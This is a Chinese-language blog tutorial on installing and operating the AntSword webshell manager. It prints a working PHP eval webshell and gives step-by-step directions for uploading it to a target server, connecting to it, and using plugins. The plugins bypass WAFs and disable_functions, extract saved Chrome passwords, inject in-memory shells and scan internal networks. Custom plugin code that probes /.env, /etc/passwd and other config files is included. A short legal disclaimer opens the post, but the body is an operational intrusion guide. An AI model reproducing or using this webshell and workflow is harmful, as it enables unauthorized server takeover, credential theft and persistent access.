蚁剑--安装、使用

用途限制声明,本文仅用于网络安全技术研究、教育与知识分享。文中涉及的渗透测试方法与工具,严禁用于未经授权的网络攻击、数据窃取或任何违法活动。任何因不当使用本文内容导致的法律后果,作者及发布平台不承担任何责任。渗透测试涉及复杂技术操作,可能对目标系统造成数据损坏、服务中断等风险。读者需充分评估技术能力与潜在后果,在合法合规前提下谨慎实践。


一、蚁剑介绍

蚁剑(AntSword) 是一款开源的 WebShell 管理工具,专为渗透测试和安全研究设计。其核心功能是连接并管理通过漏洞上传的 WebShell(一种驻留在服务器上的恶意脚本),支持图形化操作,比传统命令行工具更高效。

特点:

  • 跨平台:基于 Electron 开发,支持 Windows、Linux、macOS。

  • 插件扩展:支持自定义插件(编码解码、数据嗅探等)。

  • 多协议支持:支持 HTTP/HTTPS,可自定义请求头绕过 WAF。

二、蚁剑原理

蚁剑的核心功能是通过 “一句话木马” 实现对目标服务器的远程控制,其工作流程如下:

  1. 植入木马:在目标服务器的网页脚本(如 PHP、ASP、JSP 等)中植入 “一句话木马”,例如 PHP 的典型木马为 <?php @eval($_POST['pass']);?>(其中pass是自定义的连接密码)。
  2. 建立连接:蚁剑通过发送 HTTP POST 请求,将控制指令(如文件操作、命令执行代码)以密码pass为标识传递给木马。
  3. 执行指令:目标服务器上的木马接收到请求后,通过eval等函数执行传递的代码,将结果返回给蚁剑,从而实现文件管理、命令执行、数据库操作等功能。
  4. 通信流程

      5.关键技术:

        动态密钥交换:客户端与 WebShell 协商 AES 密钥。

        流量伪装:通过 Cookie、Header 自定义躲避安全设备检测。

        模块化加载:核心功能(文件管理、数据库连接等)按需加载。

三、安装

有多个版本的,这里我们就以windows的为例

  1. 下载地址:访问蚁剑官方 GitHub 仓库(https://github.com/AntSwordProject/AntSword-Loader),根据操作系统(Windows、macOS、Linux)下载对应版本的加载器(压缩包形式)。访问不了github的,这里下载,蚁剑-一款强大的Webshell管理工具资源-优快云下载
  2. 初始化环境
    • 解压加载器压缩包,以管理员权限运行加载器程序(如 Windows 下的AntSword.exe)。
    • 点击 “初始化” 按钮,选择一个本地文件夹作为工作目录,程序会自动下载并安装最新的源码和依赖。

进第一个,运行exe文件

需要进行初始化,选择第二个文件

  1. 启动程序:初始化完成后,重新打开加载器,即可进入蚁剑的图形化操作界面。

安装完成

四、使用

首先我们先创建一个一句话木马

<?php @eval($_POST['pass']);?>

然后将其上传至目标机的web目录下,访问,如下所示说明上传成功并且成功解析

 添加 WebShell,启动蚁剑→ 右键「添加」→ 填写信息:

  1. URL:WebShell 地址(如 http://target.com/shell.php

  2. 连接密码:WebShell 中预设的密码,就是一句话木马中的pass

  3. 编码器/解码器:默认选择 default(AES 加密)

  4. 点击「测试连接」→ 成功提示后保存。

连接成功然后添加即可,然后点击即可进入目标机,进行一系列操作

其中,蚁剑还有一个强大的功能,就是插件市场,那么具有哪些用途呢

插件市场的核心用途

  1. 增强基础功能

    • 文件管理:增加文件对比、批量操作等插件。

    • 终端增强:支持PowerShell、Python等交互式终端。

  2. 绕过安全防护

    • 绕过WAF:动态修改HTTP头部/Cookie躲避检测(如ModHeader插件)。

    • 突破disable_functions:利用LD_PRELOAD、FFI等技术执行被禁用的PHP函数。

  3. 漏洞利用自动化

    • 集成常见漏洞利用模块(如ThinkPHP RCE、WebLogic反序列化)。

  4. 内网渗透扩展

    • 端口扫描、Socks代理、内网主机发现(如PortScan插件)。

  5. 数据操作

    • 数据库导出(支持MySQL/MSSQL/Oracle)、配置文件解密。

插件安装方法

方式1:通过应用商店安装(推荐)

  1. 打开蚁剑 → 顶部菜单「插件」→「应用商店」。

  1. 搜索插件名称(如Bypass Disable Functions)→ 点击「安装」。
    https://antsword.gitee.io/docs/usage/plugins/images/plugin-store.png

方式2:手动安装插件

  1. 从GitHub下载插件(如蚁剑插件库)。

  2. 解压到蚁剑目录:antSword/plugins/

  3. 重启蚁剑生效。

注意:插件需与蚁剑版本兼容,否则可能报错。

关键插件使用示例

1. Bypass Disable Functions(绕过PHP限制)

  • 用途:突破PHP安全配置(如禁用system()函数)。

  • 操作步骤

    1. 连接WebShell → 右键目标Shell →「插件」→「Bypass Disable Functions」。

    2. 选择绕过方式(如LD_PRELOAD)→ 点击「执行」。

    3. 成功后终端自动切换至绕过环境,可执行任意命令。

2. PortScan(端口扫描)

  • 用途:扫描目标服务器内网开放端口。

  • 操作步骤

    1. 右键WebShell →「插件」→「PortScan」。

    2. 输入目标IP和端口范围(如192.168.1.1-254:80,443,3306)。

    3. 点击「扫描」→ 结果以表格形式展示。

3. ChromePass(浏览器密码提取)

  • 用途:获取服务器上Chrome保存的密码。

  • 步骤

    1. 确保目标为Windows系统。

    2. 启动插件 → 自动提取密码并显示明文结果。

4. ShellCodeLoader(内存马注入)

  • 用途:无文件攻击,将恶意载荷注入内存。

  • 步骤

    1. 生成Payload(如Java内存马)。

    2. 通过插件上传并注入到Tomcat等容器进程。

开发自定义插件

蚁剑支持JavaScript插件开发:

模块特点:

MyPlugin/
├── package.json    # 插件元数据
├── index.js        # 核心逻辑
└── icon.png        # 插件图标

例如一个简单的文件搜索插件,代码如下所示

'use strict';
module.exports = (core) => {
  // 注册右键菜单
  core.registerMenu('files', '搜索文件', async (e, path) => {
    const keyword = await core.prompt('输入关键字');
    const result = await core.request({
      url: e.URL,
      data: `search=${encodeURIComponent(keyword)}`
    });
    core.logger.info(`找到${result.length}个文件`);
  });
};

快速文件下载器插件

'use strict';

module.exports = (core) => {
  // 注册文件管理右键菜单
  core.registerMenu('filemanager', '⚡ 快速下载', async (e, filePath) => {
    const savePath = await core.gui.dialog.save({
      title: '保存文件',
      filters: [{ name: 'All Files', extensions: ['*'] }]
    });

    if (!savePath) return;

    try {
      const stream = core.utils.file.sliceDownload(e, filePath);
      await core.utils.file.saveStream(savePath, stream);
      core.logger.success(`下载成功: ${savePath}`);
    } catch (err) {
      core.logger.error(`下载失败: ${err.message}`);
    }
  });
};

系统信息速查插件

'use strict';

module.exports = (core) => {
  // 在Shell右键菜单添加选项
  core.registerMenu('shell', '🖥️ 系统信息', async (e) => {
    const commands = {
      'linux': 'uname -a; lscpu; free -h; df -h',
      'win': 'systeminfo | findstr /B /C:"OS" /C:"CPU"; wmic memorychip get capacity; fsutil volume diskfree C:'
    };

    try {
      const osType = await core.request({ data: 'echo PHP_OS;' });
      const cmd = osType.includes('WIN') ? commands.win : commands.linux;
      
      const res = await core.request({ data: cmd });
      core.gui.alert(`### 系统信息\n\`\`\`\n${res}\n\`\`\``);
    } catch (err) {
      core.logger.error(`获取失败: ${err}`);
    }
  });
};

敏感文件扫描 

'use strict';

module.exports = (core) => {
  core.registerMenu('shell', '🔍 扫描配置文件', async (e) => {
    const paths = [
      '/.env', '/config/database.php', 
      '/WEB-INF/web.xml', '/etc/passwd',
      'C:\\Windows\\win.ini'
    ];

    let results = "发现以下配置文件:\n";
    
    for (const path of paths) {
      try {
        const res = await core.request({
          data: `file_exists("${path}") ? "1" : "0";`
        });
        if (res.includes('1')) results += `✅ ${path}\n`;
      } catch (e) { /* 忽略错误 */ }
    }
    
    core.gui.alert(results || "未找到常见配置文件");
  });
};

插件安装步骤:

  1. 在蚁剑目录创建插件文件夹:

    antSword/
    └── plugins/
        ├── QuickDownloader/
        │   └── index.js
        ├── SysInfo/
        │   └── index.js
        └── ConfigScanner/
            └── index.js
  2. 重启蚁剑 → 右键菜单将出现新功能

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jieyu1119

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值